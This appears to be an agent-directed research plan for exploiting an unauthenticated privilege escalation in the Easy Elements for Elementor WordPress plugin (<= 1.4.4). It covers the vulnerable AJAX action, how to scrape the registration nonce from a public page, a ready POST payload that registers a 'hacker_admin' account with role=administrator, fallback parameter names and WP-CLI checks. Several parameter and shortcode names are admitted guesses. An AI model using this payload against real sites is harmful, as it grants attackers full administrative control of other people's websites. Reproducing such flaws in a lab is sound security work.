Easy Elements for Elementor <= 1.4.4 - Unauthenticated Privilege Escalation via easyel_handle_register

This research plan outlines the steps to verify the Critical Privilege Escalation vulnerability in the Easy Elements for Elementor plugin (<= 1.4.4).

1. Vulnerability Summary

The vulnerability exists within the easyel_handle_register function (likely an AJAX handler). The function is responsible for processing user registrations via a plugin-provided widget or form. The flaw is a lack of server-side validation or restriction on the role parameter. By default, WordPress registration should assign the role defined in "Settings > General" (usually subscriber), but this function allows the client to specify the role, enabling unauthenticated users to register as an administrator.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php
• Action: easyel_handle_register (Registered for unauthenticated users via wp_ajax_nopriv_easyel_handle_register).
• Vulnerable Parameter: role (or potentially a nested array key).
• Preconditions:
  • The plugin must be active.
  • WordPress "Anyone can register" setting may need to be enabled (though the plugin might bypass this check).
  • A valid AJAX nonce for the registration action is required.

3. Code Flow (Inferred)

1. An unauthenticated user sends a POST request to admin-ajax.php with action=easyel_handle_register.
2. The easyel_handle_register function is invoked.
3. The function extracts user details from $_POST (e.g., user_login, user_email, password, and role).
4. The function calls wp_insert_user($userdata) where $userdata['role'] is directly populated from the role parameter without being checked against a whitelist.
5. The user is created with the administrator role.

4. Nonce Acquisition Strategy

The registration function likely requires a nonce for security. Since this is an unauthenticated action, the nonce must be exposed on a public-facing page where the registration widget is used.

1. Identify the Trigger: The registration functionality is typically part of an "User Registration" Elementor widget.
2. Create a Target Page:
   • wp post create --post_type=page --post_status=publish --post_title="Register" --post_content='[easyel_registration_form]' (Note: [easyel_registration_form] is an inferred shortcode; if it's an Elementor widget, the agent should create a page and use the Elementor editor or find an existing registration page).
3. Extract the Nonce:
   • Navigate to the page using browser_navigate.
   • Search the HTML for localized data. Based on Admin_Settings.php, nonces are often stored in an object like easyElementsData.
   • Inferred JS Key: window.easyel_registration_data?.nonce or similar.
   • Execution: browser_eval("window.easyElementsData?.nonce || window.easyel_localize?.nonce").

5. Exploitation Strategy

The agent will attempt to register a new administrator via a direct AJAX request.

• Tool: http_request
• Method: POST
• URL: {{BASE_URL}}/wp-admin/admin-ajax.php
• Headers: Content-Type: application/x-www-form-urlencoded
• Payload:

  action=easyel_handle_register&
  user_login=hacker_admin&
  user_email=hacker@example.com&
  user_password=Password123!&
  confirm_password=Password123!&
  role=administrator&
  security={{NONCE}}
  

  (Note: Parameter names like user_password and security are inferred from common WordPress registration patterns and the easyel_save_user_data_callback found in Admin_Settings.php which uses security for its nonce check.)

6. Test Data Setup

1. Install/Activate Plugin: Ensure easy-elements version 1.4.4 is installed.
2. Plugin Settings: Ensure the Registration feature is enabled if there is a global toggle in the plugin dashboard.
3. WP Settings: Set wp option update users_can_register 1.
4. Registration Page: Create a page that includes the Easy Elements registration form to facilitate nonce extraction.

7. Expected Results

• Successful Exploit: The server returns a JSON success message (e.g., {"success":true,"data":{...}}).
• Failure: The server returns 403 Forbidden (nonce fail) or 400 Bad Request (missing action), or creates a user with the subscriber role instead of administrator.

8. Verification Steps

After the HTTP request, use WP-CLI to verify the privilege escalation:

1. Check User Existence: wp user list --field=user_login (Should see hacker_admin).
2. Check User Role: wp user get hacker_admin --field=roles (Should return administrator).

9. Alternative Approaches

If role is not the correct parameter name, check for:

• user_role
• userdata[role]
• settings[role] (Mapping from the easyel_save_user_data_callback pattern seen in the source).

If the easyel_handle_register action is not found, search the plugin directory for the string wp_ajax_nopriv_ to identify the correct registration action name:
grep -r "wp_ajax_nopriv_" wp-content/plugins/easy-elements/